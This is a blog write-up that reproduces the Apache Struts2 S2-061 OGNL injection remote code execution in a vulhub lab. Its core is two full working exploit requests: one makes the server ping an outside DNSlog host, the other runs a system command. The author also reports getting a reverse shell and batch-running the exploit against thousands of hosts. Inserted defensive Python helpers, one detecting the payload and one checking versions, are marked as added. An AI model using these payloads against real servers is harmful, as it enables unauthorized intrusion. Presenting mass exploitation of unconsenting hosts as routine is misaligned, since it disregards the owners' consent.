I have been following the Struts2 S2-061 vulnerability recently, and only today did I have time to reproduce it.

Struts2 S2-061 remote command execution vulnerability reproduction


I. Vulnerability introduction

Apache Struts 2 is a web framework for developing Java EE web applications. On December 8, 2020, Apache Struts disclosed S2-061, a Struts remote code execution vulnerability (CVE-2020-17530). When certain tags are used in particular ways, attacker-controlled input can reach OGNL expression evaluation; the resulting OGNL expression injection leads to remote code execution, so the risk is severe.

II. Affected versions

Apache Struts 2.0.0 through 2.5.25

III. Vulnerability reproduction

Docker environment (vulhub project address):

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

Pull the image and start the environment:

docker-compose up -d

Access target address:

http://192.168.1.107:8080/

Verify the vulnerability through DNSlog:

POST /index.action HTTP/1.1
Host: 192.168.1.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 846

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping p0fai2.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

DNSlog record (screenshot not reproduced here).

Running the id command:

POST /index.action HTTP/1.1
Host: 192.168.1.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 827

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
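From the defensive side, an added example (not part of the original write-up and not vulhub's code): a small Python checker that splits a multipart/form-data request of the shape shown above and flags form fields that contain an OGNL expression opener or one of the class names the public payload relies on. The host, boundary and field values are constructed samples, and the indicator list is illustrative rather than a complete signature set; it is meant for triage of WAF or access logs that retain request bodies.

```python
import re
from typing import Dict, List

# Indicator strings taken from the request body reproduced in the write-up
# above: the OGNL expression opener and the class names the public S2-061
# payload uses. Illustrative only, not a complete signature set.
OGNL_OPEN = re.compile(r"%\{|\$\{")
SUSPICIOUS_TOKENS = [
    "#instancemanager",
    "org.apache.tomcat.InstanceManager",
    "com.opensymphony.xwork2.util.ValueStack.ValueStack",
    "org.apache.commons.collections.BeanMap",
    "memberAccess",
    "excludedClasses",
    "excludedPackageNames",
    "freemarker.template.utility.Execute",
]


def parse_multipart_fields(body: str, boundary: str) -> Dict[str, str]:
    """Minimal multipart/form-data splitter: returns {field name: value}."""
    fields: Dict[str, str] = {}
    delim = "--" + boundary
    for part in body.split(delim):
        part = part.strip()
        if not part or part == "--":  # empty preamble or the closing "--" marker
            continue
        head, sep, value = part.partition("\r\n\r\n")
        if not sep:  # tolerate bodies that were normalised to bare LF
            head, sep, value = part.partition("\n\n")
        name = re.search(r'name="([^"]*)"', head)
        if name:
            fields[name.group(1)] = value.strip()
    return fields


def score_value(value: str) -> List[str]:
    """Return the indicators found in one form-field value (empty if clean)."""
    hits: List[str] = []
    if OGNL_OPEN.search(value):
        hits.append("ognl-expression-open")
    hits.extend(tok for tok in SUSPICIOUS_TOKENS if tok in value)
    return hits


def inspect_request(raw: str) -> Dict[str, List[str]]:
    """Map each suspicious form field of a raw HTTP request to its indicators."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition("\n\n")
    m = re.search(r"boundary=([^\s;]+)", head, re.IGNORECASE)
    # Without a multipart boundary, scan the whole body as a single pseudo-field.
    fields = parse_multipart_fields(body, m.group(1)) if m else {"(body)": body}
    findings: Dict[str, List[str]] = {}
    for name, value in fields.items():
        hits = score_value(value)
        if hits:
            findings[name] = hits
    return findings


# Constructed sample requests: host, boundary and field values are made up.
BOUNDARY = "----ConstructedBoundary0001"


def _multipart_request(field_value: str) -> str:
    return "\r\n".join([
        "POST /index.action HTTP/1.1",
        "Host: 192.0.2.10:8080",
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}",
        "",
        f"--{BOUNDARY}",
        'Content-Disposition: form-data; name="id"',
        "",
        field_value,
        f"--{BOUNDARY}--",
        "",
    ])


BENIGN_REQUEST = _multipart_request("42")
SUSPICIOUS_REQUEST = _multipart_request(
    "%{(#m=#application['org.apache.tomcat.InstanceManager']).(#m)}"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST)):
        print(label, inspect_request(req))
```

The splitter deliberately keys on the field name so that a hit can be tied back to the parameter (here `id`) that the vulnerable tag attribute reads; when run over real logs, feed `inspect_request` the raw request text exactly as captured, since normalising whitespace first would also erase the OGNL markers it looks for.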

Verification with a simple Python script (screenshot not reproduced here):

A reverse shell can also be obtained:

Batch-running against thousands of hosts produced few successes (perhaps the default index path is wrong); something to look into later.

IV. Security recommendations

Upgrade the Apache Struts framework to the latest version.
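To make the upgrade advice actionable, here is an added Python helper (not from the original post or from Apache Struts) that compares a Struts version string against the affected range stated in section II, 2.0.0 through 2.5.25, and scans a list of jar paths for struts2-core jars inside that range. The paths are constructed samples from no real host; the comparison treats any version above 2.5.25 as outside the stated range and does not attempt to judge patch releases the write-up does not mention.

```python
import re
from typing import List, Tuple

# Affected range as stated in the write-up: Apache Struts 2.0.0 through 2.5.25.
AFFECTED_MIN: Tuple[int, ...] = (2, 0, 0)
AFFECTED_MAX: Tuple[int, ...] = (2, 5, 25)

# Matches the standard Maven artifact name, e.g. struts2-core-2.5.25.jar.
JAR_RE = re.compile(r"struts2-core-(\d+(?:\.\d+)*)\.jar$")


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.5' or '2.5.25' into a comparable tuple, padding to three parts."""
    parts = tuple(int(p) for p in version.strip().split("."))
    if len(parts) < 3:
        parts = parts + (0,) * (3 - len(parts))
    return parts


def is_affected(version: str) -> bool:
    """True when the version falls inside the range stated in section II."""
    v = parse_version(version)
    return AFFECTED_MIN <= v <= AFFECTED_MAX


def find_affected_jars(paths: List[str]) -> List[Tuple[str, str]]:
    """Return (path, version) for every struts2-core jar in the affected range."""
    hits: List[Tuple[str, str]] = []
    for path in paths:
        m = JAR_RE.search(path)
        if m and is_affected(m.group(1)):
            hits.append((path, m.group(1)))
    return hits


# Constructed sample inventory; these paths do not come from any real system.
SAMPLE_INVENTORY = [
    "/opt/tomcat/webapps/app1/WEB-INF/lib/struts2-core-2.5.25.jar",
    "/opt/tomcat/webapps/app2/WEB-INF/lib/struts2-core-2.5.26.jar",
    "/opt/tomcat/webapps/legacy/WEB-INF/lib/struts2-core-2.3.37.jar",
    "/opt/tomcat/webapps/app3/WEB-INF/lib/commons-collections-3.2.2.jar",
]

if __name__ == "__main__":
    for path, version in find_affected_jars(SAMPLE_INVENTORY):
        print(f"affected: struts2-core {version} at {path}")
```

In practice the path list would come from something like `find / -name 'struts2-core-*.jar'` or a software inventory export; the point of the version tuple is that a naive string comparison would rank "2.5.9" above "2.5.25" and miss vulnerable deployments.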

Official advisory:

cwiki.apache.org/confluence/…

Reference:

www.safedog.cn/news.html?i…

www.cnblogs.com/potatsoSec/…

Disclaimer: The security tools and programs (methods) provided on this site may be offensive in nature and are intended only for security research and teaching; you bear the risk of using them!

Disclaimer: Copyright belongs to the author. For commercial reprints, please contact the author for authorization; for non-commercial reprints, please credit the source.

thelostworld

Personal Zhihu: www.zhihu.com/people/fu-w…

Personal Jianshu: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq_3760279…

Personal Cnblogs: www.cnblogs.com/thelostworl…